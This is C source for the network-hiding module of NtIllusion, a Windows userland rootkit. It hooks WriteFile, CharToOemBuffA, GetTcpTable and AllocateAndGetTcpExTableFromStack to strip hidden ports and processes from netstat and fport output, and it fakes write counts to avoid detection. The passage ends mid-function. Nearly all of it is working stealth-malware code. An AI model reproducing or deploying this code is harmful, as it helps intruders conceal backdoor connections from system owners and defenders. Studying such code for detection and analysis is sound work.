kntinethide.c

rootit uloading by benina

/******************************************************************************
  kNTINetHide.c	: Network stealth
  *****************************************************************************
  Author		: Kdm (Kodmaker@syshell.org)
  WebSite		: http://www.syshell.org

  Copyright (C) 2003,2004 Kdm
  *****************************************************************************
  This file is part of NtIllusion.

  NtIllusion is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; either version 2 of the License, or
  (at your option) any later version.

  NtIllusion is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details.

  You should have received a copy of the GNU General Public License
  along with NtIllusion; if not, write to the Free Software
  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  ******************************************************************************/

#include <winsock2.h>				// for socket hijack
#include <tlhelp32.h>				// Tool help 32 functions
#include <windows.h>
#include "kNTINetHide.h"
#include "../../Misc/kNTIConfig.h"
#include "../../Misc/kNTILib.h"

FARPROC fAllocateAndGetTcpExTableFromStack;
FARPROC fGetTcpTable;
FARPROC fCharToOemBuffA;
FARPROC fDeviceIoControl;
FARPROC fWriteFile;
extern FARPROC fGetProcAddress;	// import genuine GetProcAddress

void ShowError()
{
LPVOID lpMsgBuf;
FormatMessage( 
    FORMAT_MESSAGE_ALLOCATE_BUFFER | 
    FORMAT_MESSAGE_FROM_SYSTEM | 
    FORMAT_MESSAGE_IGNORE_INSERTS,
    NULL,
    GetLastError(),
    MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language
    (LPTSTR) &lpMsgBuf,
    0,
    NULL 
);
// Process any inserts in lpMsgBuf.
// ...
// Display the string.
//OutputString( "Error: %s (%d)\n", (LPCTSTR)lpMsgBuf, GetLastError());
OutputString( "Error: %s\n", (LPCTSTR)lpMsgBuf);
// Free the buffer.
LocalFree( lpMsgBuf );

}

// Convert FPORT.exe's output mode from char by char to line by line to allow hidding
// of lines containing ports to hide
BOOL WINAPI MyWriteFile(
  HANDLE hFile,                    // handle to file to write to
  LPCVOID lpBuffer,                // pointer to data to write to file
  DWORD nNumberOfBytesToWrite,     // number of bytes to write
  LPDWORD lpNumberOfBytesWritten,  // pointer to number of bytes written
  LPOVERLAPPED lpOverlapped        // pointer to structure for overlapped I/O
  ){
	BOOL bret=TRUE;
	static DWORD total_len=0;
	static char PreviousChars[2048*10];	// bof? ;p
	char* chr = (char*)lpBuffer;

	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()
	if(!fWriteFile) {
		fWriteFile = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"WriteFile");
		if(!fWriteFile) return 0;
	}

	PreviousChars[total_len++] = chr[0]; // add new char
	if(chr[0] == '\r') 
	{

		PreviousChars[total_len] = '\n';
		PreviousChars[++total_len] = '\0';
		// show this line only if it contains no hidden port / process prefix
		if(strstr((char*)PreviousChars,(char*)RTK_PORT_HIDE_STR)==NULL	// hidden port ?
		&& strstr((char*)PreviousChars,(char*)RTK_PROCESS_CHAR)==NULL)  // hidden process ?
		{
			bret = fWriteFile(hFile, (void*)PreviousChars, strlen((char*)PreviousChars), lpNumberOfBytesWritten, lpOverlapped);
		}
		else
		{
			OutputString("[!] NTIllusion made a port hidden (%s* range)\n", (int)RTK_PORT_HIDE_STR);
		}
		
		memset(PreviousChars, 0, 2048);
		total_len= 0;
	}
	(*lpNumberOfBytesWritten) = nNumberOfBytesToWrite; // fake var, so fport can't see output wasn't done
	return bret;
}


// Used by fport to directly get tcp/udp information
// cf http://www.rootkit.com/board.php?thread=1120&did=edge103&disp=1120
// We won't hijack here as dwIoControlCode and data structures are subject to change
BOOL WINAPI MyDeviceIoControl(HANDLE hDevice, DWORD dwIoControlCode, LPVOID lpInBuffer,
  DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned,
  LPOVERLAPPED lpOverlapped )
{
	//OutputString("[!] MyDeviceIoControl(dwIoControlCode==%x)\n", dwIoControlCode);
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()
	if(!fDeviceIoControl) {
		fDeviceIoControl = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"DeviceIoControl");
		if(!fDeviceIoControl) return 0;
	}
	
	return (*fDeviceIoControl)(hDevice, dwIoControlCode, lpInBuffer, nInBufferSize, 
		lpOutBuffer, nOutBufferSize, lpBytesReturned, lpOverlapped);
}


//		MyCharToOemBuffA : replace the function used by nestat to convert strings to a different
//		charset before it sends it to output, so we can get rid of some awkward lines...  :)
BOOL WINAPI MyCharToOemBuff(LPCTSTR lpszSrc, LPSTR lpszDst, DWORD cchDstLength)
{
	// Get real address using GetProcAddress because the function may not have been hijacked at IAT
	// level but using GetProcAddress()
	if(!fCharToOemBuffA) {
		fCharToOemBuffA = (FARPROC) fGetProcAddress(GetModuleHandle("user32.dll"),"CharToOemBuffA");
		if(!fCharToOemBuffA) return 0;
	}

	// If the line contains our range of port, we simply get rid of it.
	if(strstr(lpszSrc,(char*)RTK_PORT_HIDE_STR)!=NULL)
	{
		if(VERBOSE_STEALTH) {
			OutputString("[!] NTIllusion made a port hidden (%s* range)\n", (int)RTK_PORT_HIDE_STR);
		}
		return (*fCharToOemBuffA)("", lpszDst, cchDstLength); 
	}
	return (*fCharToOemBuffA)(lpszSrc, lpszDst, cchDstLength);
}



// Returns 1 if Row must be hidden according to parameters passed
// if( IsHidden( htons((u_short)portX), htons((u_short)portY) ) ) ...
int IsHidden(u_long LocalPort, u_long RemotePort) 
{
	int hidethis=0;

	if(	((LocalPort >=RTK_PORT_HIDE_MIN) &&   (LocalPort<=RTK_PORT_HIDE_MAX))	// local port is in hidden range ?
	||  ((RemotePort>=RTK_PORT_HIDE_MIN) &&   (RemotePort <= RTK_PORT_HIDE_MAX))// remote port is in hidden range ?
	||  (LocalPort *10) == RTK_PORT_HIDE_MIN									// is RTK_PORT_HIDE_STR?			
	||  (RemotePort*10) == RTK_PORT_HIDE_MIN									// is RTK_PORT_HIDE_STR?
	)	
		hidethis=1;
	
	return hidethis;
}

DWORD WINAPI MyGetTcpTable(PMIB_TCPTABLE_ pTcpTable, PDWORD pdwSize, BOOL bOrder)
{
	FARPROC fhtons;
	HINSTANCE hLib;
	HINSTANCE hDll;
	u_long LocalPort=0, RemotePort=0;
	DWORD dwRetVal=0, numRows=0;
	FARPROC fGetTcpTable;
	int i,j;


	// Resolve fGetTcpTable
	hLib = LoadLibrary("iphlpapi.dll");
	if(!hLib)
		OutputString("!hlib\n");

	fGetTcpTable = (FARPROC) fGetProcAddress(hLib, "GetTcpTable");
	if(!fGetTcpTable)
		OutputString("!fGetTcpTable\n");

	
	// Resolve htons
	hDll = LoadLibrary("wsock32.dll");
	if(!hDll)
	{
		OutputString("[!]	!hDll\n");
		return 0;
	}
	
	fhtons = (FARPROC) fGetProcAddress(hDll, "htons");
	if(!fhtons)
	{
		OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
		return 0;
	}


	// Call function, if no error, strip unwanted MIB_TCPROWs
	if ((dwRetVal = (*fGetTcpTable)(pTcpTable, pdwSize, bOrder)) == NO_ERROR) 
	{

		// for each row, test if it must be stripped
		for (i=0; i<(int)pTcpTable->dwNumEntries; i++) 
		{

			LocalPort	= (u_short) fhtons((u_short)(pTcpTable)->table[i].dwLocalPort);
			RemotePort	= (u_short) fhtons((u_short)(pTcpTable)->table[i].dwRemotePort);
			OutputString("#	GetTcpTable %d<=>%d\n", LocalPort, RemotePort);

			// If row must be filtered
			if( IsHidden(LocalPort, RemotePort) )
			{
				OutputString("filtering port %d\n", LocalPort);
				
				for(j=i; j<((int)pTcpTable->dwNumEntries - 1); j++)
					memcpy( &(pTcpTable->table[i]), &(pTcpTable->table[i+1]), sizeof(MIB_TCPROW_));
				memset( &(pTcpTable->table[j]), 0x00, sizeof(MIB_TCPROW_));
				
				(*pdwSize)-= sizeof(MIB_TCPROW_);
				(pTcpTable->dwNumEntries)--;
				// o o o o
				// 0 1 2 3

			}	  
		}
	}

	return dwRetVal;
}


//		AllocateAndGetTcpExTableFromStack : Universal TCP ports state review hook.
//		This will hide all connections whose :
//		- local port is in hidden range
//		- remote port is in hidden range
//		- process name starts by RTK_FILE_CHAR
//		- process name is unknow
//		Dued to crosschecks between hijacked functions, any unknown process must be
//		considered as a hidden process.

// Netstat :
// MyAllocateAndGetTcpExTableFromStack only used when flag -o (process associated with
// open port) is triggered.

// consulter les sources de netstatk
DWORD WINAPI MyAllocateAndGetTcpExTableFromStack( 
  PMIB_TCPEXTABLEEx *pTcpTable,	// buffer for the connection table
  BOOL bOrder,					// sort the table?
  HANDLE heap,
  DWORD zero,